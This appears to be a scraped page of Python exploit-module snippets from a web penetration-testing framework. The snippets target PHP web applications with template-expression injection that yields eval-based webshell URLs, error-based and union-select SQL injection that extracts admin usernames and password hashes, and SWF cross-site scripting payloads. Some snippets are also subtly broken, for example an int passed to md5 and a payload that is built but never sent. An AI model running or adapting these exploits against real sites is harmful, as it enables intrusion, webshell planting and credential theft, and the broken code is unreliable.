Ejemplo n.º 1
def exploit(options):
    """Probe one path for a template-expression injection and report the outcome.

    Args:
        options: framework option dict; ``options['target']['current_value']``
            is the target base URL.

    Returns:
        The derived URL string when the response carries the phpinfo() title,
        otherwise ``None``.
    """
    base = options['target']['current_value']
    probe = base + "/index.php/module/aciton/param1/${@phpinfo()}"
    logger.process("Requesting target site")
    resp = http.get(probe)
    # The only success marker checked is the phpinfo() page title.
    if "<title>phpinfo()</title>" not in resp.text:
        return None
    logger.success("Exploitable!")
    logger.success("Phpinfo: %s" % probe)
    derived = probe.replace("@phpinfo()", "@print(eval($_POST[chu]))")
    logger.success("Webshell: %s" % derived)
    return derived
Ejemplo n.º 2
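def exploit(options):
    """Run ``verify`` against the target and report whatever it returns.

    Args:
        options: framework option dict; ``options["target"]["current_value"]``
            is the target base URL.

    Returns:
        ``"<url>: <result[0]>|<result[1]>"`` on success; ``None`` when
        ``verify`` (or the result handling) raises. The failure is logged
        rather than silently dropped, and the function itself never raises
        for ordinary errors.
    """
    logger.process("Requesting target site")
    url = options["target"]["current_value"]
    try:
        result = verify(url)
        logger.success("Username: %s" % result[0])
        logger.success("password: %s" % result[1])
        return "%s: %s|%s" % (url, result[0], result[1])
    except Exception as exc:
        # Narrowed from a bare ``except:`` so KeyboardInterrupt/SystemExit
        # still propagate, and the cause is visible in the log instead of
        # being swallowed (a typo or missing helper used to look like "not
        # vulnerable").
        logger.error("verify failed: %s" % exc)
        return None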
Ejemplo n.º 3
def exploit(options):
    """Fingerprint ``flvplayer.swf`` on the target by the MD5 of its body.

    Args:
        options: framework option dict; ``options['target']['current_value']``
            is the target base URL.

    Returns:
        The probed URL when the response body's MD5 equals the known
        fingerprint, else ``None``.
    """
    base = options['target']['current_value']
    probe = (base
             + "/static/image/common/flvplayer.swf?file=1.flv&"
             + "linkfromdisplay=true&link=javascript:alert(1);")
    logger.process("Requesting target site")
    # Second positional argument is passed through to http.get unchanged
    # (presumably a timeout; its meaning is not visible here).
    resp = http.get(probe, 5)
    # Match on the raw body digest rather than a substring search.
    digest = hashlib.md5(resp.content).hexdigest()
    if digest != "7d675405ff7c94fa899784b7ccae68d3":
        return None
    logger.success("Exploitable!")
    logger.success(probe)
    return probe
Ejemplo n.º 4
def exploit(options):
    """Fingerprint ``swfupload.swf`` on the target by the MD5 of its body.

    Args:
        options: framework option dict; ``options['target']['current_value']``
            is the target base URL.

    Returns:
        The probed URL when the response body's MD5 equals the known
        fingerprint, else ``None``.
    """
    base = options['target']['current_value']
    probe = (base
             + "/plugins/kindeditor/plugins/multiimage/images/swfupload.swf"
             + '?movieName="]%29;}catch%28e%29{}if%28!self.a%29self.a=!alert%281%29;//')
    logger.process("Requesting target site")
    resp = http.get(probe)
    # Match on the raw body digest rather than a substring search.
    digest = hashlib.md5(resp.content).hexdigest()
    if digest != "3a1c6cc728dddc258091a601f28a9c12":
        return None
    logger.success("Exploitable!")
    logger.success(probe)
    return probe
Ejemplo n.º 5
def exploit(options):
    """Append the module-level ``payload`` to the target and report the verdict.

    Args:
        options: framework option dict; ``options["target"]["current_value"]``
            is the target base URL.

    Returns:
        ``True`` when ``valiator(response.text) == True``, else ``False``.
    """
    # ``payload`` and ``valiator`` are module globals defined outside this block.
    target = options["target"]["current_value"] + payload
    logger.process("send request...")
    resp = http.get(target)
    # Compared with ``== True`` (not truthiness); valiator's return type is
    # not visible here, so a truthy non-bool would count as a miss.
    hit = valiator(resp.text) == True
    if not hit:
        logger.error("exploit fail, target site no xss ! :(")
        return False
    logger.success("exploit success, target site have xss vuln ! :)")
    return True
Ejemplo n.º 6
def verify(url):
    """POST the error-based probe and report whether the DB error is echoed.

    Args:
        url: target URL to POST the form fields to.

    Returns:
        ``True`` when "MySQL Query Error" appears in the response body;
        ``None`` otherwise.
    """
    logger.process("Requesting target site")
    form = {
        "gids[99]": "'",
        "gids[100][0]": (
            ") and (select 1 from (select count(*"
            "),concat(version(),floor(rand(0)*2))"
            "x from information_schema.tables gro"
            "up by x)a)#"
        ),
    }
    resp = http.post(url, form)
    # Detection keys only on the verbatim error string in the body.
    if "MySQL Query Error" not in resp.text:
        return None
    logger.success("Exploitable!")
    return True
Ejemplo n.º 7
def verify(url):
    """POST ``c=phpinfo()`` to ``/data/config.inc.php`` and check for phpinfo output.

    Args:
        url: target base URL; the config path is appended to it.

    Returns:
        ``{'shell': <url>, 'passwd': 'c'}`` when "phpinfo" appears in the
        response body, else ``False``.
    """
    logger.process("Verify webshell...")
    shell_url = url + '/data/config.inc.php'
    # Body is sent as a raw string, not a dict.
    body = 'c=phpinfo()'
    resp = http.post(shell_url, body)
    if "phpinfo" not in resp.text:
        logger.error('Exploit fail :(')
        return False
    logger.success("Exploit success :)")
    return {'shell': shell_url, 'passwd': 'c'}
Ejemplo n.º 8
def exploit(options):
    """Send the union-select probe and parse the marker-delimited fields back.

    Args:
        options: framework option dict; ``options['target']['current_value']``
            is the target base URL and ``options['cookie']['current_value']``
            the Cookie header value to send.

    Returns:
        ``"<url>: <username>|<hash>"`` when the marker is in the response
        body, else ``None``.
    """
    base = options['target']['current_value']
    logger.process("Requesting " + base)
    probe = base + (
        "/?m=topic&a=topic&keyword=a%27%20and%201=2%20union%20select"
        "%201,2,3,concat(0x68616e64736f6d65636875,user_name,0x7e7e7e,"
        "password,0x68616e64736f6d65636875),5%20from%20et_users%23"
    )
    cookie_header = {'Cookie': options['cookie']['current_value']}
    # Third positional argument is passed through to http.get unchanged
    # (presumably a timeout; not verifiable here).
    resp = http.get(probe, cookie_header, 5)
    if "handsomechu" not in resp.text:
        return None
    logger.success("Exploitable!")
    # Unpacking assumes exactly two '~~~'-separated parts after the marker.
    username, password = resp.text.split("handsomechu")[1].split("~~~")
    logger.success("Username: %s" % username)
    logger.success("Hash: %s" % password)
    return "%s: %s|%s" % (probe, username, password)
Ejemplo n.º 9
def exploit(options):
    """Try two candidate search endpoints for a template-expression injection.

    Args:
        options: framework option dict; ``options['target']['current_value']``
            is the target base URL.

    Returns:
        The derived URL for the first endpoint whose response carries the
        phpinfo() title; ``None`` when neither does.
    """
    base = options['target']['current_value']
    marker = "%24%7B%40phpinfo%28%29%7D"
    candidates = [
        base + "/index.php/search.html?keyword=" + marker,
        base + "/search.html?keyword=" + marker,
    ]
    for idx, probe in enumerate(candidates, 1):
        logger.process("Testing URL %d..." % idx)
        resp = http.get(probe)
        if "<title>phpinfo()</title>" not in resp.text:
            continue
        logger.success("Exploitable!")
        logger.success("Phpinfo: %s" % probe)
        derived = probe.replace(marker, "%24%7B%40eval(%24_POST%5B'chu'%5D)%7D")
        logger.success("WebShell: %s" % derived)
        return derived
    return None
Ejemplo n.º 10
def get_hash(url):
    """POST the error-based probe and split the echoed fields out of the body.

    Args:
        url: target URL to POST the form fields to.

    Returns:
        ``{"username": ..., "md5": ...}`` taken from the '~~~'/'~'-delimited
        segment of the response body.

    Raises:
        IndexError: when the response body does not contain the delimiters.
    """
    logger.process("Getting manager's hash")
    form = {
        "gids[99]": "'",
        "gids[100][0]": (
            ") and (select 1 from (select count(*"
            "),concat((select (select (select con"
            "cat(0x7e7e7e,username,0x7e,password,"
            "0x7e7e7e) from cdb_members limit 0,1"
            ") ) from `information_schema`.tables"
            " limit 0,1),floor(rand(0)*2))x from "
            "information_schema.tables group by x"
            ")a)#"
        ),
    }
    resp = http.post(url, form)
    # Segment between the first two '~~~' markers, then split on single '~'.
    fields = resp.text.split("~~~")[1].split("~")
    return {"username": fields[0], "md5": fields[1]}
def exploit(options):
    """Send the union-select probe with the configured cookie and parse the result.

    Args:
        options: framework option dict; ``options['target']['current_value']``
            is the target base URL and ``options['cookie']['current_value']``
            the Cookie header value to send.

    Returns:
        ``"<url>: <username>|<hash>"`` when the marker is in the response
        body, else ``None``.
    """
    base = options['target']['current_value']
    logger.process("Requesting " + base)
    probe = base + (
        "/?m=message&a=show&uid=%27)%20union%20select%20concat(0x686"
        "16e64736f6d65636875,user_name,0x7e7e7e,password,0x68616e647"
        "36f6d65636875)%20from%20et_users%20limit%201,1%23"
    )
    cookie_header = {'Cookie': options['cookie']['current_value']}
    # Third positional argument is passed through to http.get unchanged
    # (presumably a timeout; not verifiable here).
    resp = http.get(probe, cookie_header, 5)
    if "handsomechu" not in resp.text:
        return None
    logger.success("Exploitable!")
    # Unpacking assumes exactly two '~~~'-separated parts after the marker.
    username, password = resp.text.split("handsomechu")[1].split("~~~")
    logger.success("Username: %s" % username)
    logger.success("Hash: %s" % password)
    return "%s: %s|%s" % (probe, username, password)
Ejemplo n.º 12
def exploit(options):
    """Send one request with a fixed custom header and look for "success".

    Args:
        options: framework option dict; ``options["target"]["current_value"]``
            is the target URL.

    Returns:
        ``True`` when ``"success" in response`` holds for the object returned
        by ``http.get``, else ``False``.
    """
    logger.process("set exploit params...")
    target = options["target"]["current_value"]
    logger.process("send request...")
    extra_headers = {'xxoo': '1111111111111111'}
    # Third positional argument is passed through to http.get unchanged
    # (presumably a timeout; not verifiable here).
    resp = http.get(target, extra_headers, 1)
    # Membership is tested on the response object itself, not on resp.text.
    found = "success" in resp
    if found:
        logger.success("exploit success ! :)")
    else:
        logger.error("exploit fail ! :(")
    return found
Ejemplo n.º 13
def exploit(options):
    """Fetch the target URL and look for an MD5 hex digest in the response.

    Args:
        options: framework option dict; ``options["target"]["current_value"]``
            is the target URL.

    Returns:
        ``True`` when the digest is found in the response object, else ``False``.
    """
    logger.process("set exploit params...")
    target = options["target"]["current_value"]
    # Built here but not used by the request below, which goes to ``target``.
    payload = target + 'index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x5e,concat(1,(select md5(1))),1)'
    logger.process("send request...")
    resp = http.get(target)
    # hashlib.md5 receives the int 1 here, not a bytes object.
    marker = hashlib.md5(1).hexdigest()
    # Membership is tested on the response object itself, not on resp.text.
    if marker in resp:
        logger.success("exploit success ! :)")
        return True
    logger.error("exploit fail ! :(")
    return False
Ejemplo n.º 14
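 def do_exploit(self, line):
     """Run the currently selected exploit, if one is loaded.

     Args:
         line: console argument string; not used by this command.

     Returns:
         Whatever ``self.run_exploit()`` returns, or ``None`` when no
         exploit is selected (nothing is logged in that case).
     """
     if not self.current_exploit:
         return None
     # Status message spelling corrected ("Exloit" -> "Exploit").
     logger.process("Exploit init...")
     return self.run_exploit()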